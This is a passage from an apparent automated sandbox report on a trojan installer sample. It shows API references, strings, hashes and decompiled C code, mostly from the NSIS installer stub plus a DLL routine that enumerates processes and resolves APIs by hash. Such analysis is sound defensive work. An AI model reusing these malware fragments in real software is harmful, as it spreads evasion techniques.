                                                          • lstrcatA.KERNEL32(0042B8C0,\*.*,0042B8C0,?,?,74B5FA90,74B5F560,00000000), ref: 00405A86
                                                          • lstrcatA.KERNEL32(?,0040A014,?,0042B8C0,?,?,74B5FA90,74B5F560,00000000), ref: 00405AA7
                                                          • lstrlenA.KERNEL32(?,?,0040A014,?,0042B8C0,?,?,74B5FA90,74B5F560,00000000), ref: 00405AAD
                                                          • FindFirstFileA.KERNEL32(0042B8C0,?,?,?,0040A014,?,0042B8C0,?,?,74B5FA90,74B5F560,00000000), ref: 00405ABE
                                                          • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B6B
                                                          • FindClose.KERNEL32(00000000), ref: 00405B7C
                                                          Strings
                                                          • "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe" , xrefs: 00405A15
                                                          • \*.*, xrefs: 00405A80
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe" $\*.*
                                                          • API String ID: 2035342205-1610178204
                                                          • Opcode ID: 69a25cc0b3387fa96190ed46bbbe5fcf67501b15cfd31fdf283598513c4af137
                                                          • Instruction ID: d18931d2cc373ca10ddd825d8c89070702ac43f2d06cec063aa43078d7fd9c24
                                                          • Opcode Fuzzy Hash: 69a25cc0b3387fa96190ed46bbbe5fcf67501b15cfd31fdf283598513c4af137
                                                          • Instruction Fuzzy Hash: EB51AE30900A08AADF21AB258C85BAF7B78DF42714F14417BF841761D1D77CA982DE69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E73784225(void* __eflags, intOrPtr _a4) {
                                                          				intOrPtr _v8;
                                                          				void* _v12;
                                                          				intOrPtr _v16;
                                                          				intOrPtr _v20;
                                                          				intOrPtr _v24;
                                                          				char _v544;
                                                          				void* _v580;
                                                          				struct tagPROCESSENTRY32W* _t25;
                                                          
                                                          				_v8 = E7378458C();
                                                          				_v16 = E73784634(_v8, 0xea31d3b6);
                                                          				_v20 = E73784634(_v8, 0x5c7bf6e9);
                                                          				_v24 = E73784634(_v8, 0x873d1860);
                                                          				_v12 = CreateToolhelp32Snapshot(2, 0);
                                                          				if(_v12 != 0xffffffff) {
                                                          					_v580 = 0x22c;
                                                          					_t25 =  &_v580;
                                                          					Process32FirstW(_v12, _t25);
                                                          					if(_t25 != 0) {
                                                          						while(E737841E1( &_v544) != _a4) {
                                                          							if(Process32NextW(_v12,  &_v580) != 0) {
                                                          								continue;
                                                          							}
                                                          							return 0;
                                                          						}
                                                          						return 1;
                                                          					}
                                                          					return 0;
                                                          				}
                                                          				return 0;
                                                          			}











                                                          0x73784233
                                                          0x73784243
                                                          0x73784253
                                                          0x73784263
                                                          0x7378426d
                                                          0x73784274
                                                          0x7378427a
                                                          0x73784284
                                                          0x7378428e
                                                          0x73784293
                                                          0x73784299
                                                          0x737842be
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x737842c0
                                                          0x00000000
                                                          0x737842ac
                                                          0x00000000
                                                          0x73784295
                                                          0x00000000

                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 7378426A
                                                          • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 7378428E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.211111185.0000000073783000.00000040.00020000.sdmp, Offset: 73780000, based on PE: true
                                                          • Associated: 00000001.00000002.211060795.0000000073780000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.211078275.0000000073781000.00000080.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.211091894.0000000073782000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.211127067.0000000073785000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 2353314856-0
                                                          • Opcode ID: 4fec2c12de2fa19a68e7ad0317d70262ee43ba40948bb73445af5165cff89eff
                                                          • Instruction ID: 26493201bd6638d3b6e4b0228575df3fed1340a6cf06b81de293edd9709ab76e
                                                          • Opcode Fuzzy Hash: 4fec2c12de2fa19a68e7ad0317d70262ee43ba40948bb73445af5165cff89eff
                                                          • Instruction Fuzzy Hash: 43112770E05229BFEF11DFB0CD4ABEDBBB8EF04310F1045A5E915E2190E7B04A519A55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004065C1(CHAR* _a4) {
                                                          				void* _t2;
                                                          
                                                          				_t2 = FindFirstFileA(_a4, 0x42c108); // executed
                                                          				if(_t2 == 0xffffffff) {
                                                          					return 0;
                                                          				}
                                                          				FindClose(_t2);
                                                          				return 0x42c108;
                                                          			}




                                                          0x004065cc
                                                          0x004065d5
                                                          0x00000000
                                                          0x004065e2
                                                          0x004065d8
                                                          0x00000000

                                                          APIs
                                                          • FindFirstFileA.KERNELBASE(74B5FA90,0042C108,0042BCC0,00405D16,0042BCC0,0042BCC0,00000000,0042BCC0,0042BCC0,74B5FA90,?,74B5F560,00405A35,?,74B5FA90,74B5F560), ref: 004065CC
                                                          • FindClose.KERNEL32(00000000), ref: 004065D8
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID:
                                                          • API String ID: 2295610775-0
                                                          • Opcode ID: 408c3bd952a2bc64c67f6fce5e771ecc13df240ec72af80f2275416dd01175bc
                                                          • Instruction ID: 5989989b5290daefe0063212e93516784f0ef67bd1aed84395a1ba9114d6aba9
                                                          • Opcode Fuzzy Hash: 408c3bd952a2bc64c67f6fce5e771ecc13df240ec72af80f2275416dd01175bc
                                                          • Instruction Fuzzy Hash: 1BD01231508130ABC7455B387D4C85B7A98AF153317618A37F466F12E4C734CC228698
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 96%
                                                          			E00403A60(void* __eflags) {
                                                          				intOrPtr _v4;
                                                          				intOrPtr _v8;
                                                          				int _v12;
                                                          				void _v16;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				intOrPtr* _t17;
                                                          				void* _t25;
                                                          				void* _t27;
                                                          				int _t28;
                                                          				void* _t31;
                                                          				int _t34;
                                                          				int _t35;
                                                          				intOrPtr _t36;
                                                          				int _t39;
                                                          				char _t57;
                                                          				CHAR* _t59;
                                                          				signed char _t63;
                                                          				CHAR* _t74;
                                                          				intOrPtr _t76;
                                                          				CHAR* _t81;
                                                          
                                                          				_t76 =  *0x42f454;
                                                          				_t17 = E00406656(2);
                                                          				_t84 = _t17;
                                                          				if(_t17 == 0) {
                                                          					_t74 = 0x42a8b8;
                                                          					"1033" = 0x30;
                                                          					 *0x436001 = 0x78;
                                                          					 *0x436002 = 0;
                                                          					E00406134(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a8b8, 0);
                                                          					__eflags =  *0x42a8b8;
                                                          					if(__eflags == 0) {
                                                          						E00406134(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x42a8b8, 0);
                                                          					}
                                                          					lstrcatA("1033", _t74);
                                                          				} else {
                                                          					E004061AB("1033",  *_t17() & 0x0000ffff);
                                                          				}
                                                          				E00403D25(_t71, _t84);
                                                          				_t80 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
                                                          				 *0x42f4e0 =  *0x42f45c & 0x00000020;
                                                          				 *0x42f4fc = 0x10000;
                                                          				if(E00405CD3(_t84, "C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
                                                          					L16:
                                                          					if(E00405CD3(_t92, _t80) == 0) {
                                                          						E004062E0(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
                                                          					}
                                                          					_t25 = LoadImageA( *0x42f440, 0x67, 1, 0, 0, 0x8040);
                                                          					 *0x42ec28 = _t25;
                                                          					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
                                                          						L21:
                                                          						if(E0040140B(0) == 0) {
                                                          							_t27 = E00403D25(_t71, __eflags);
                                                          							__eflags =  *0x42f500;
                                                          							if( *0x42f500 != 0) {
                                                          								_t28 = E00405446(_t27, 0);
                                                          								__eflags = _t28;
                                                          								if(_t28 == 0) {
                                                          									E0040140B(1);
                                                          									goto L33;
                                                          								}
                                                          								__eflags =  *0x42ec0c; // 0x0
                                                          								if(__eflags == 0) {
                                                          									E0040140B(2);
                                                          								}
                                                          								goto L22;
                                                          							}
                                                          							ShowWindow( *0x42a898, 5); // executed
                                                          							_t34 = E004065E8("RichEd20"); // executed
                                                          							__eflags = _t34;
                                                          							if(_t34 == 0) {
                                                          								E004065E8("RichEd32");
                                                          							}
                                                          							_t81 = "RichEdit20A";
                                                          							_t35 = GetClassInfoA(0, _t81, 0x42ebe0);
                                                          							__eflags = _t35;
                                                          							if(_t35 == 0) {
                                                          								GetClassInfoA(0, "RichEdit", 0x42ebe0);
                                                          								 *0x42ec04 = _t81;
                                                          								RegisterClassA(0x42ebe0);
                                                          							}
                                                          							_t36 =  *0x42ec20; // 0x0
                                                          							_t39 = DialogBoxParamA( *0x42f440, _t36 + 0x00000069 & 0x0000ffff, 0, E00403DFD, 0); // executed
                                                          							E004039B0(E0040140B(5), 1);
                                                          							return _t39;
                                                          						}
                                                          						L22:
                                                          						_t31 = 2;
                                                          						return _t31;
                                                          					} else {
                                                          						_t71 =  *0x42f440;
                                                          						 *0x42ebe4 = E00401000;
                                                          						 *0x42ebf0 =  *0x42f440;
                                                          						 *0x42ebf4 = _t25;
                                                          						 *0x42ec04 = 0x40a210;
                                                          						if(RegisterClassA(0x42ebe0) == 0) {
                                                          							L33:
                                                          							__eflags = 0;
                                                          							return 0;
                                                          						}
                                                          						SystemParametersInfoA(0x30, 0,  &_v16, 0);
                                                          						 *0x42a898 = CreateWindowExA(0x80, 0x40a210, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f440, 0);
                                                          						goto L21;
                                                          					}
                                                          				} else {
                                                          					_t71 =  *(_t76 + 0x48);
                                                          					_t86 = _t71;
                                                          					if(_t71 == 0) {
                                                          						goto L16;
                                                          					}
                                                          					_t74 = 0x42e3e0;
                                                          					E00406134(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f498, 0x42e3e0, 0);
                                                          					_t57 =  *0x42e3e0; // 0x43
                                                          					if(_t57 == 0) {
                                                          						goto L16;
                                                          					}
                                                          					if(_t57 == 0x22) {
                                                          						_t74 = 0x42e3e1;
                                                          						 *((char*)(E00405C10(0x42e3e1, 0x22))) = 0;
                                                          					}
                                                          					_t59 = lstrlenA(_t74) + _t74 - 4;
                                                          					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
                                                          						L15:
                                                          						E0040624D(_t80, E00405BE5(_t74));
                                                          						goto L16;
                                                          					} else {
                                                          						_t63 = GetFileAttributesA(_t74);
                                                          						if(_t63 == 0xffffffff) {
                                                          							L14:
                                                          							E00405C2C(_t74);
                                                          							goto L15;
                                                          						}
                                                          						_t92 = _t63 & 0x00000010;
                                                          						if((_t63 & 0x00000010) != 0) {
                                                          							goto L15;
                                                          						}
                                                          						goto L14;
                                                          					}
                                                          				}
                                                          			}

























                                                          0x00403a66
                                                          0x00403a6f
                                                          0x00403a76
                                                          0x00403a78
                                                          0x00403a8c
                                                          0x00403a9e
                                                          0x00403aa5
                                                          0x00403aac
                                                          0x00403ab2
                                                          0x00403ab7
                                                          0x00403abd
                                                          0x00403ad0
                                                          0x00403ad0
                                                          0x00403adb
                                                          0x00403a7a
                                                          0x00403a85
                                                          0x00403a85
                                                          0x00403ae0
                                                          0x00403aea
                                                          0x00403af3
                                                          0x00403af8
                                                          0x00403b09
                                                          0x00403b90
                                                          0x00403b98
                                                          0x00403ba1
                                                          0x00403ba1
                                                          0x00403bb7
                                                          0x00403bbd
                                                          0x00403bcb
                                                          0x00403c4c
                                                          0x00403c54
                                                          0x00403c5e
                                                          0x00403c63
                                                          0x00403c69
                                                          0x00403cf3
                                                          0x00403cf8
                                                          0x00403cfa
                                                          0x00403d16
                                                          0x00000000
                                                          0x00403d16
                                                          0x00403cfc
                                                          0x00403d02
                                                          0x00403d0a
                                                          0x00403d0a
                                                          0x00000000
                                                          0x00403d02
                                                          0x00403c77
                                                          0x00403c82
                                                          0x00403c87
                                                          0x00403c89
                                                          0x00403c90
                                                          0x00403c90
                                                          0x00403c9b
                                                          0x00403ca3
                                                          0x00403ca5
                                                          0x00403ca7
                                                          0x00403cb0
                                                          0x00403cb3
                                                          0x00403cb9
                                                          0x00403cb9
                                                          0x00403cbf
                                                          0x00403cd8
                                                          0x00403ce9
                                                          0x00000000
                                                          0x00403cee
                                                          0x00403c56
                                                          0x00403c58
                                                          0x00000000
                                                          0x00403bcd
                                                          0x00403bcd
                                                          0x00403bd9
                                                          0x00403be3
                                                          0x00403be9
                                                          0x00403bee
                                                          0x00403bfd
                                                          0x00403d1b
                                                          0x00403d1b
                                                          0x00000000
                                                          0x00403d1b
                                                          0x00403c0c
                                                          0x00403c47
                                                          0x00000000
                                                          0x00403c47
                                                          0x00403b0f
                                                          0x00403b0f
                                                          0x00403b12
                                                          0x00403b14
                                                          0x00000000
                                                          0x00000000
                                                          0x00403b1e
                                                          0x00403b2e
                                                          0x00403b33
                                                          0x00403b3a
                                                          0x00000000
                                                          0x00000000
                                                          0x00403b3e
                                                          0x00403b40
                                                          0x00403b4d
                                                          0x00403b4d
                                                          0x00403b55
                                                          0x00403b5b
                                                          0x00403b83
                                                          0x00403b8b
                                                          0x00000000
                                                          0x00403b6d
                                                          0x00403b6e
                                                          0x00403b77
                                                          0x00403b7d
                                                          0x00403b7e
                                                          0x00000000
                                                          0x00403b7e
                                                          0x00403b79
                                                          0x00403b7b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403b7b
                                                          0x00403b5b

                                                          APIs
                                                            • Part of subcall function 00406656: GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
                                                            • Part of subcall function 00406656: GetProcAddress.KERNEL32(00000000,?), ref: 00406683
                                                          • lstrcatA.KERNEL32(1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,74B5FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe" ,00000000), ref: 00403ADB
                                                          • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,74B5FA90), ref: 00403B50
                                                          • lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000), ref: 00403B63
                                                          • GetFileAttributesA.KERNEL32(Call), ref: 00403B6E
                                                          • LoadImageA.USER32 ref: 00403BB7
                                                            • Part of subcall function 004061AB: wsprintfA.USER32 ref: 004061B8
                                                          • RegisterClassA.USER32 ref: 00403BF4
                                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403C0C
                                                          • CreateWindowExA.USER32 ref: 00403C41
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403C77
                                                          • GetClassInfoA.USER32 ref: 00403CA3
                                                          • GetClassInfoA.USER32 ref: 00403CB0
                                                          • RegisterClassA.USER32 ref: 00403CB9
                                                          • DialogBoxParamA.USER32 ref: 00403CD8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$B
                                                          • API String ID: 1975747703-767625228
                                                          • Opcode ID: ab99cccd9c0ddd3d495b147680853500dcd9db92bcd335ab5c1b079dcb87365f
                                                          • Instruction ID: 8734c0f5f73e26911640e72846d54346a9337973c4420bd4a4a6803de24d7ebf
                                                          • Opcode Fuzzy Hash: ab99cccd9c0ddd3d495b147680853500dcd9db92bcd335ab5c1b079dcb87365f
                                                          • Instruction Fuzzy Hash: 1B61C6702042007EE620BF669D46F373AACDB4474DF94443FF945B62E2CA7DA9068A2D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 96%
                                                          			E00402EF1(void* __eflags, signed int _a4) {
                                                          				long _v8;
                                                          				long _v12;
                                                          				intOrPtr _v16;
                                                          				long _v20;
                                                          				intOrPtr _v24;
                                                          				intOrPtr _v28;
                                                          				intOrPtr _v32;
                                                          				intOrPtr _v36;
                                                          				signed int _v40;
                                                          				char _v300;
                                                          				long _t54;
                                                          				void* _t57;
                                                          				void* _t62;
                                                          				intOrPtr _t65;
                                                          				void* _t68;
                                                          				intOrPtr* _t70;
                                                          				long _t82;
                                                          				signed int _t89;
                                                          				intOrPtr _t92;
                                                          				intOrPtr _t100;
                                                          				void* _t104;
                                                          				intOrPtr _t105;
                                                          				long _t106;
                                                          				long _t109;
                                                          				void* _t110;
                                                          
                                                          				_v8 = 0;
                                                          				_v12 = 0;
                                                          				 *0x42f450 = GetTickCount() + 0x3e8;
                                                          				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe", 0x400);
                                                          				_t104 = E00405DE6("C:\\Users\\hardz\\Desktop\\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe", 0x80000000, 3);
                                                          				 *0x40a018 = _t104;
                                                          				if(_t104 == 0xffffffff) {
                                                          					return "Error launching installer";
                                                          				}
                                                          				E0040624D("C:\\Users\\hardz\\Desktop", "C:\\Users\\hardz\\Desktop\\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe");
                                                          				E0040624D(0x437000, E00405C2C("C:\\Users\\hardz\\Desktop"));
                                                          				_t54 = GetFileSize(_t104, 0);
                                                          				 *0x429470 = _t54;
                                                          				_t109 = _t54;
                                                          				if(_t54 <= 0) {
                                                          					L22:
                                                          					E00402E52(1);
                                                          					if( *0x42f458 == 0) {
                                                          						goto L30;
                                                          					}
                                                          					if(_v12 == 0) {
                                                          						L26:
                                                          						_t57 = GlobalAlloc(0x40, _v20); // executed
                                                          						_t110 = _t57;
                                                          						_t105 = 8;
                                                          						 *0x415458 = 0x40d450;
                                                          						 *0x415454 = 0x40d450;
                                                          						 *0x40b8b0 = _t105;
                                                          						 *0x40bdcc = 0;
                                                          						 *0x40bdc8 = 0;
                                                          						 *0x415450 = 0x415450; // executed
                                                          						E00405E15( &_v300, "C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
                                                          						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
                                                          						 *0x40a01c = _t62;
                                                          						if(_t62 != 0xffffffff) {
                                                          							_t65 = E0040343E( *0x42f458 + 0x1c);
                                                          							 *0x429474 = _t65;
                                                          							 *0x429468 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                                          							_t68 = E004031B7(_v16, 0xffffffff, 0, _t110, _v20); // executed
                                                          							if(_t68 == _v20) {
                                                          								 *0x42f454 = _t110;
                                                          								 *0x42f45c =  *_t110;
                                                          								if((_v40 & 0x00000001) != 0) {
                                                          									 *0x42f460 =  *0x42f460 + 1;
                                                          								}
                                                          								_t45 = _t110 + 0x44; // 0x44
                                                          								_t70 = _t45;
                                                          								_t100 = _t105;
                                                          								do {
                                                          									_t70 = _t70 - _t105;
                                                          									 *_t70 =  *_t70 + _t110;
                                                          									_t100 = _t100 - 1;
                                                          								} while (_t100 != 0);
                                                          								 *((intOrPtr*)(_t110 + 0x3c)) =  *0x429464;
                                                          								E00405DA1(0x42f480, _t110 + 4, 0x40);
                                                          								return 0;
                                                          							}
                                                          							goto L30;
                                                          						}
                                                          						return "Error writing temporary file. Make sure your temp folder is valid.";
                                                          					}
                                                          					E0040343E( *0x429460);
                                                          					if(E00403428( &_a4, 4) == 0 || _v8 != _a4) {
                                                          						goto L30;
                                                          					} else {
                                                          						goto L26;
                                                          					}
                                                          				} else {
                                                          					do {
                                                          						_t106 = _t109;
                                                          						asm("sbb eax, eax");
                                                          						_t82 = ( ~( *0x42f458) & 0x00007e00) + 0x200;
                                                          						if(_t109 >= _t82) {
                                                          							_t106 = _t82;
                                                          						}
                                                          						if(E00403428(0x421460, _t106) == 0) {
                                                          							E00402E52(1);
                                                          							L30:
                                                          							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                          						}
                                                          						if( *0x42f458 != 0) {
                                                          							if((_a4 & 0x00000002) == 0) {
                                                          								E00402E52(0);
                                                          							}
                                                          							goto L19;
                                                          						}
                                                          						E00405DA1( &_v40, 0x421460, 0x1c);
                                                          						_t89 = _v40;
                                                          						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
                                                          							_a4 = _a4 | _t89;
                                                          							 *0x42f500 =  *0x42f500 | _a4 & 0x00000002;
                                                          							_t92 = _v16;
                                                          							 *0x42f458 =  *0x429460;
                                                          							if(_t92 > _t109) {
                                                          								goto L30;
                                                          							}
                                                          							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                          								_v12 = _v12 + 1;
                                                          								_t109 = _t92 - 4;
                                                          								if(_t106 > _t109) {
                                                          									_t106 = _t109;
                                                          								}
                                                          								goto L19;
                                                          							} else {
                                                          								goto L22;
                                                          							}
                                                          						}
                                                          						L19:
                                                          						if(_t109 <  *0x429470) {
                                                          							_v8 = E0040670D(_v8, 0x421460, _t106);
                                                          						}
                                                          						 *0x429460 =  *0x429460 + _t106;
                                                          						_t109 = _t109 - _t106;
                                                          					} while (_t109 != 0);
                                                          					goto L22;
                                                          				}
                                                          			}




























                                                          0x00402eff
                                                          0x00402f02
                                                          0x00402f1c
                                                          0x00402f21
                                                          0x00402f34
                                                          0x00402f39
                                                          0x00402f3f
                                                          0x00000000
                                                          0x00402f41
                                                          0x00402f52
                                                          0x00402f63
                                                          0x00402f6a
                                                          0x00402f72
                                                          0x00402f77
                                                          0x00402f79
                                                          0x00403067
                                                          0x00403069
                                                          0x00403075
                                                          0x00000000
                                                          0x00000000
                                                          0x0040307e
                                                          0x004030aa
                                                          0x004030af
                                                          0x004030b5
                                                          0x004030be
                                                          0x004030bf
                                                          0x004030c4
                                                          0x004030d5
                                                          0x004030db
                                                          0x004030e1
                                                          0x004030e7
                                                          0x004030f1
                                                          0x0040310c
                                                          0x00403115
                                                          0x0040311a
                                                          0x00403139
                                                          0x00403149
                                                          0x0040315b
                                                          0x00403160
                                                          0x00403168
                                                          0x00403175
                                                          0x0040317d
                                                          0x00403182
                                                          0x00403184
                                                          0x00403184
                                                          0x0040318a
                                                          0x0040318a
                                                          0x0040318d
                                                          0x0040318f
                                                          0x0040318f
                                                          0x00403191
                                                          0x00403193
                                                          0x00403193
                                                          0x0040319d
                                                          0x004031a9
                                                          0x00000000
                                                          0x004031ae
                                                          0x00000000
                                                          0x00403168
                                                          0x00000000
                                                          0x0040311c
                                                          0x00403086
                                                          0x00403098
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00402f7f
                                                          0x00402f7f
                                                          0x00402f84
                                                          0x00402f88
                                                          0x00402f8f
                                                          0x00402f96
                                                          0x00402f98
                                                          0x00402f98
                                                          0x00402fa7
                                                          0x00403128
                                                          0x0040316a
                                                          0x00000000
                                                          0x0040316a
                                                          0x00402fb3
                                                          0x00403037
                                                          0x0040303a
                                                          0x0040303f
                                                          0x00000000
                                                          0x00403037
                                                          0x00402fc0
                                                          0x00402fc5
                                                          0x00402fcd
                                                          0x00402ff3
                                                          0x00403002
                                                          0x00403008
                                                          0x0040300d
                                                          0x00403013
                                                          0x00000000
                                                          0x00000000
                                                          0x0040301d
                                                          0x00403025
                                                          0x00403028
                                                          0x0040302d
                                                          0x0040302f
                                                          0x0040302f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040301d
                                                          0x00403040
                                                          0x00403046
                                                          0x00403056
                                                          0x00403056
                                                          0x00403059
                                                          0x0040305f
                                                          0x0040305f
                                                          0x00000000
                                                          0x00402f7f

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00402F05
                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe,00000400), ref: 00402F21
                                                            • Part of subcall function 00405DE6: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe,80000000,00000003), ref: 00405DEA
                                                            • Part of subcall function 00405DE6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C
                                                          • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe,80000000,00000003), ref: 00402F6A
                                                          • GlobalAlloc.KERNELBASE(00000040,0040A130), ref: 004030AF
                                                          Strings
                                                          • "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe" , xrefs: 00402EF1
                                                          • C:\Users\user\Desktop, xrefs: 00402F4C, 00402F51, 00402F57
                                                          • C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe, xrefs: 00402F0B, 00402F1A, 00402F2E, 00402F4B
                                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040311C
                                                          • Error launching installer, xrefs: 00402F41
                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 0040316A
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EFB, 004030CF
                                                          • Null, xrefs: 00402FEA
                                                          • soft, xrefs: 00402FE1
                                                          • Inst, xrefs: 00402FD8
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
